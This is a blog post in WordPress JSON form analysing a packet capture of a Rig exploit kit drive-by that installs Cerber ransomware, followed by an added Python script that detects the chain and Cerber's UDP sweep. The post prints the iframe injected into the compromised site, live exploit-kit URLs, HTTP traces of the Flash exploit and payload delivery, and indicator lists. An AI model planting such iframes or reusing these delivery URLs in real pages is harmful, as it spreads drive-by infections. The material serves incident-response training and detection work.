{"id":607,"date":"2016-11-14T15:28:07","date_gmt":"2016-11-14T15:28:07","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=607"},"modified":"2016-11-14T15:28:07","modified_gmt":"2016-11-14T15:28:07","slug":"malware-exercise-2016-10-15-crybaby-businessman","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=607","title":{"rendered":"Malware Exercise 2016-10-15 Crybaby businessman"},"content":{"rendered":"<p>So it has been a while since I have updated the blog. The joys of trying to study for the SANS GCIA while also working and trying to squeeze in some time for the family as well. So I thought that I would pick up on the latest exercise that Brad published (granted it was from last month). As usual, the artifacts from this investigation are in my Github repo located <a href=\"http:\/\/github.com\/bloomer1016\/Malware-exercise-2016-10-15\" target=\"_blank\">here<\/a>. Once I have taken the test (and hopefully passed it), I can get back to writing more stuff and trying to figure out how the scripts work. But till then&#8230;<\/p>\n<p>About the Investigation<br \/>\n=======================<br \/>\n\u2013 Date and time range of the traffic you\u2019re reviewing.<br \/>\n&gt; First packet: 2016-10-14 22:41:45 \/ Last packet: 2016-10-14 23:19:51 \/ Elapsed: 00:38:05<\/p>\n<p>\u2013 Date and time of infection.<br \/>\n&gt; 2016-10-14 22:14:42<\/p>\n<p>\u2013 IP address, MAC address<br \/>\n&gt; 10.14.106.192 \/ 00:05:31:c2:6f:b2<\/p>\n<p>\u2013 Description of the activity (what happened, if the host became infected, any details, etc.).<br \/>\n&gt; From what I saw in the PCAP, the user visited a site that had been compromised with an injected iframe. That site redirected the browser to an exploit kit landing page, which served a Flash exploit that downloaded and ran a malicious binary on the system. Once the binary executed, the user was presented with the &#8220;Cerber Decryptor&#8221; HTML page (the ransom note). 
The exploit kit (EK) used here was Rig, leading to a Cerber ransomware infection.<\/p>\n<p>\u2013 A conclusion with recommendations for any follow-up actions.<br \/>\n&gt; The system should be removed from the network and a backup of the user&#8217;s (now encrypted) data should be made in case someone is later able to break the Cerber encryption so the files can be recovered. Once that has been done, the system should be reimaged (rekicked) from a known-good build to make sure the infection is contained. I would also suggest blocking the IP addresses and\/or the domains associated with this infection to help reduce the attack surface, keeping in mind that exploit kit domains rotate quickly, so such blocks are a short-term measure. I would also talk to the IT team to find out what patches are rolled out and how often, since the infection vector here was a Flash exploit delivered through the browser, and keeping Flash and the browser patched (or removing Flash altogether) is what stops this class of exploit from succeeding. <\/p>\n<p>\u2013 Indicators of Compromise (IP, FQDN, etc\u2026)<br \/>\n===========================================<br \/>\n&gt; 50.56.223.21 \/ unwrappedphotos.com (compromised site)<br \/>\n&gt; 109.234.36.251 \/ rew.kaghaan.com (Rig EK landing page, Flash exploit and payload)<br \/>\n&gt; 107.161.95.138 \/ ffoqr3ug7m726zou.le2brr.bid (Cerber Decryptor page)<br \/>\n&gt; 148.251.6.214 \/ btc.blockr.io (public Bitcoin block explorer queried by the Decryptor page)<br \/>\n&gt; 173.254.231.111 \/ ffoqr3ug7m726zou.19jmfr.top (Cerber Decryptor page)<br \/>\n&gt; 31.184.234.0\/23 range (post-infection UDP, DST port: 6892)<\/p>\n<p>Hash Information of Artifacts<br \/>\n=============================<br \/>\nFile name: rew.kaghaan.com-flash.swf<br \/>\nSize: 49KB (50,368 bytes)<br \/>\nMD5 hash: 9d8a1f948a043dd7ee7b64154986513e<br \/>\nVirustotal: <a href=\"http:\/\/virustotal.com\/en\/file\/b95fa5beddf64653bf88456ed521a0b7226d4fb4f5e8983b85ca5d03d8621be5\/analysis\/\" target=\"_blank\">http:\/\/virustotal.com\/en\/file\/b95fa5beddf64653bf88456ed521a0b7226d4fb4f5e8983b85ca5d03d8621be5\/analysis\/<\/a><\/p>\n<p>File name: flash-exploit-binary.exe<br \/>\nSize: 479KB (490,175 bytes as served)<br \/>\nMD5 hash: 85f22cabd66f365a864b6e04cda85fa0<br \/>\nVirustotal: NA<\/p>\n<p>Notes From The Investigation<br \/>\n=============================<br \/>\nBased on the PCAP, the user went to Google and looked up the site called &#8220;unwrappedphotos.com.&#8221; 
Unfortunately, the site had been compromised with an injected iframe, which made it the gate into the exploit kit, as shown below:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\"> \r\n&lt;&#x5B;i]frame src=&quot;hxxp:\/\/rew.KAGHAAN.COM\/?xHiMdbKYJBrMDIQ=l3SKfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9wffY1wRq5TAF-M8jgnzmbJFJc4jw0DT72FZmOMaBF9G4xgY0Q&quot; width=&quot;267&quot; height=&quot;267&quot;&gt;&lt;\/iframe&gt;\r\n<\/pre>\n<p>From here the client makes a GET request to the Rig landing page on rew.kaghaan.com, which returns an 18,840-byte gzip-compressed HTML response. The landing page then requests the malicious Flash file (Content-Type: application\/x-shockwave-flash, 50,368 bytes; the CWS signature at the start of the body is the header of a zlib-compressed SWF), and the Flash exploit in turn fetches the encrypted malicious binary (Content-Type: application\/x-msdownload, 490,175 bytes). Two details of that third request are worth noting: it carries no Referer header and uses a different User-Agent string (the SLCC2 \/ .NET CLR variant), which indicates it was issued by the exploit&#8217;s shellcode rather than by the browser&#8217;s normal page load, and the body does not begin with the MZ header of a Windows executable, consistent with Rig encrypting the payload in transit and decrypting it on the victim before execution. <\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET \/?xHiMdbKYJBrMDIQ=l3SKfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9wffY1wRq5TAF-M8jgnzmbJFJc4jw0DT72FZmOMaBF9G4xgY0Q HTTP\/1.1\r\nAccept: text\/html, application\/xhtml+xml, *\/*\r\nReferer: http:\/\/unwrappedphotos.com\/\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\nAccept-Encoding: gzip, deflate\r\nHost: rew.kaghaan.com\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.6.2\r\nDate: Fri, 14 Oct 2016 22:14:45 GMT\r\nContent-Type: text\/html; charset=UTF-8\r\nContent-Length: 18840\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nContent-Encoding: gzip\r\n\r\n.................68<\/pre>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET 
\/index.php?xHiMdbKYJBrMDIQ=l3SMfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9wffY1wRq5TAF-M8jgnzmbJFJc4jw0DT72FZmOMaBF9G4xgY36TIHLOL-AFiXwE4UgfbbNlwsxaBWiTiJGQ23OWwGTF9merP_bo HTTP\/1.1\r\nAccept: *\/*\r\nReferer: http:\/\/rew.kaghaan.com\/?xHiMdbKYJBrMDIQ=l3SKfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9wffY1wRq5TAF-M8jgnzmbJFJc4jw0DT72FZmOMaBF9G4xgY0Q\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\nAccept-Encoding: gzip, deflate\r\nHost: rew.kaghaan.com\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.6.2\r\nDate: Fri, 14 Oct 2016 22:14:46 GMT\r\nContent-Type: application\/x-shockwave-flash\r\nContent-Length: 50368\r\nConnection: keep-alive\r\n\r\nCWS\r\nn...x.\\...0...9....m..m..m..m..m<\/pre>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET \/index.php?xHiMdbKYJBrMDIQ=l3SMfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9wffY1wRq5TAF-M8jgnzmbJFJc4jw0DT72FZmOMaBF9G4xgY36TIHLOL-AFiXwE4Ugfbct4lsxaBWiTiJGQ23OWwGTFyn-3O9vw5 HTTP\/1.1\r\nConnection: Keep-Alive\r\nAccept: *\/*\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; rv:11.0) like Gecko\r\nHost: rew.kaghaan.com\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.6.2\r\nDate: Fri, 14 Oct 2016 22:14:53 GMT\r\nContent-Type: application\/x-msdownload\r\nContent-Length: 490175\r\nConnection: keep-alive\r\nAccept-Ranges: bytes\r\n\r\n=|i~C\r\n........8..vY3..<\/pre>\n<p>Once the binary had been downloaded and executed, I then started seeing one of the classic signs of a Cerber infection &#8211; UDP traffic to a range of IP addresses (in this case 31.184.234.x &#8211; 
31.184.235.x) on UDP destination port 6892. Because the sweep touches a whole range of addresses on a single port from one host, counting distinct destinations per source host and UDP port over a short window catches it regardless of which range a given Cerber build uses. The traffic is shown below:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/11\/IMG1.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/11\/IMG1.png\" alt=\"Wireshark view of UDP traffic from 10.14.106.192 to the 31.184.234.0\/23 range on port 6892\" width=\"1636\" height=\"640\" class=\"aligncenter size-full wp-image-608\" \/><\/a><\/p>\n<p>We can then see the requests to &#8220;ffoqr3ug7m726zou.le2brr.bid,&#8221; &#8220;btc.blockr.io,&#8221; and &#8220;ffoqr3ug7m726zou.19jmfr.top,&#8221; which all relate to building the Cerber Decryptor HTML page, the ransom note that alerted the user that his files were encrypted. The two ffoqr3ug7m726zou hosts (the same random-looking label on two throwaway TLDs) are the Cerber Decryptor sites; btc.blockr.io is a public Bitcoin block explorer that the page queries, so it is an indicator only in combination with the rest of this traffic and not a domain to treat as malicious on its own.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/11\/IMG2.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/11\/IMG2.png\" alt=\"HTTP requests to the Cerber Decryptor sites and btc.blockr.io following the infection\" width=\"1620\" height=\"925\" class=\"aligncenter size-full wp-image-609\" \/><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>So it has been a while since I have updated the blog. The joys of trying to study for the SANS GCIA while also working and trying to squeeze in some time for the family as well. So I thought that I would pick up on the latest exercise that Brad published (granted it was from last month). As usual, the artifacts found in this investigation can be found in my Github repo located here. 
Once I have taken the test (and hopefully passed it), I can get back to writing more stuff and trying to figure out how the&#8230;<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=607\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-607","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/607","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=607"}],"version-history":[{"count":3,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/607\/revisions"}],"predecessor-version":[{"id":612,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/607\/revisions\/612"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=607"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=607"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=607"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
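The Rig EK chain and the Cerber UDP sweep that the post above walks through can be turned into detection logic. The following is an added example written for this page, not code from the original post or from the author's GitHub repo. It runs over two constructed inputs modelled on the values in the post (the host names, Content-Type values, leading bytes and User-Agent strings are taken from the captured streams; the query strings, timestamps and the UDP destination list are shortened or synthesised stand-ins): HTTP transactions and UDP datagrams as pipe-separated lines of the kind `tshark -T fields` can export. The tshark invocation that would produce such lines from the PCAP is assumed, not shown.

```python
import ipaddress
import urllib.parse
from collections import defaultdict

# ---- constructed sample data (not taken from the capture itself) ------------
# The two User-Agent strings are the ones seen in the post; the second one
# appears only on the payload request. Query strings are shortened to AAAA etc.
BROWSER_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
PAYLOAD_UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; "
              ".NET CLR 2.0.50727; rv:11.0) like Gecko")

# ts|src|host|uri|referer|user_agent|response_content_type|first_response_bytes_hex
HTTP_LOG = f"""\
1476483282|10.14.106.192|unwrappedphotos.com|/|http://www.google.com/|{BROWSER_UA}|text/html|3c68746d6c
1476483285|10.14.106.192|rew.kaghaan.com|/?xHiMdbKYJBrMDIQ=AAAA|http://unwrappedphotos.com/|{BROWSER_UA}|text/html|1f8b0800
1476483286|10.14.106.192|rew.kaghaan.com|/index.php?xHiMdbKYJBrMDIQ=BBBB|http://rew.kaghaan.com/?xHiMdbKYJBrMDIQ=AAAA|{BROWSER_UA}|application/x-shockwave-flash|43575309
1476483293|10.14.106.192|rew.kaghaan.com|/index.php?xHiMdbKYJBrMDIQ=CCCC||{PAYLOAD_UA}|application/x-msdownload|3d7c697e43
"""

SWF_MAGIC = (b"FWS", b"CWS", b"ZWS")   # uncompressed / zlib / LZMA SWF headers


def parse_http(log):
    """Pipe-separated HTTP lines -> list of dicts; leading bytes become bytes."""
    records = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, src, host, uri, referer, ua, ctype, first_hex = line.split("|")
        records.append({"ts": float(ts), "src": src, "host": host.lower(),
                        "uri": uri, "referer": referer, "ua": ua,
                        "ctype": ctype.lower(), "first": bytes.fromhex(first_hex)})
    return records


def referer_host(referer):
    return urllib.parse.urlsplit(referer).netloc.lower() if referer else ""


def find_ek_chain(records):
    """Return gate -> landing -> Flash exploit -> payload, or None.

    Chain = cross-site Referer into a host answering with HTML, then from the
    same host a SWF (Content-Type plus file signature), then an
    application/x-msdownload response. The dict also records the Rig tells:
    payload body not starting with MZ, no Referer, and a changed User-Agent.
    """
    for i, landing in enumerate(records):
        gate = referer_host(landing["referer"])
        if not gate or gate == landing["host"] or not landing["ctype"].startswith("text/html"):
            continue
        flash = payload = None
        for later in records[i + 1:]:
            if later["host"] != landing["host"]:
                continue
            if flash is None:
                if later["ctype"] == "application/x-shockwave-flash" and later["first"][:3] in SWF_MAGIC:
                    flash = later
            elif later["ctype"] == "application/x-msdownload":
                payload = later
                break
        if flash and payload:
            return {"gate": gate, "ek_host": landing["host"],
                    "landing_uri": landing["uri"], "flash_uri": flash["uri"],
                    "payload_uri": payload["uri"],
                    "payload_obfuscated": not payload["first"].startswith(b"MZ"),
                    "payload_no_referer": payload["referer"] == "",
                    "ua_changed": payload["ua"] != landing["ua"]}
    return None


def build_udp_sample():
    """Synthesised UDP log (ts|src|dst|dport): one host sweeping 31.184.234.0/23
    on port 6892, plus two benign datagrams (DNS and NTP to the local gateway)."""
    lines, t = [], 1476483300.0
    for third in (234, 235):
        for last in range(1, 21):
            lines.append(f"{t:.3f}|10.14.106.192|31.184.{third}.{last}|6892")
            t += 0.01
    lines.append(f"{t:.3f}|10.14.106.192|10.14.106.1|53")
    lines.append(f"{t + 1:.3f}|10.14.106.192|10.14.106.1|123")
    return "\n".join(lines)


def covering_network(lo, hi):
    """Smallest CIDR block containing both addresses (e.g. 31.184.234.0/23)."""
    net = ipaddress.ip_network(str(lo))
    while hi not in net:
        net = net.supernet()
    return net


def find_udp_sweeps(log, min_targets=32, window=60.0):
    """Flag (src, dport) pairs that reach >= min_targets distinct destinations
    within any `window` seconds, and summarise the range that was swept."""
    by_key = defaultdict(list)
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = line.split("|")
        by_key[(src, int(dport))].append((float(ts), ipaddress.ip_address(dst)))
    hits = []
    for (src, dport), events in by_key.items():
        events.sort()
        in_window, left, peak = {}, 0, 0   # distinct dsts inside the sliding window
        for ts, dst in events:
            in_window[dst] = in_window.get(dst, 0) + 1
            while ts - events[left][0] > window:     # expire old datagrams
                old = events[left][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            peak = max(peak, len(in_window))
        if peak >= min_targets:
            dsts = sorted({d for _, d in events})
            hits.append({"src": src, "dport": dport, "targets": len(dsts),
                         "peak_in_window": peak,
                         "network": str(covering_network(dsts[0], dsts[-1]))})
    return hits


if __name__ == "__main__":
    print("EK chain:", find_ek_chain(parse_http(HTTP_LOG)))
    for hit in find_udp_sweeps(build_udp_sample()):
        print("UDP sweep:", hit)
```

find_ek_chain() keys on the three things that distinguish the Rig chain in the streams above: a cross-site Referer into a host that then serves a SWF, followed by an application/x-msdownload response whose body is not an MZ executable, with the payload request lacking a Referer and carrying a different User-Agent. find_udp_sweeps() counts distinct destinations per (source, UDP port) in a sliding window and reports the covering CIDR block, so it fires on the 31.184.234.0/23 sweep without that range being hard-coded.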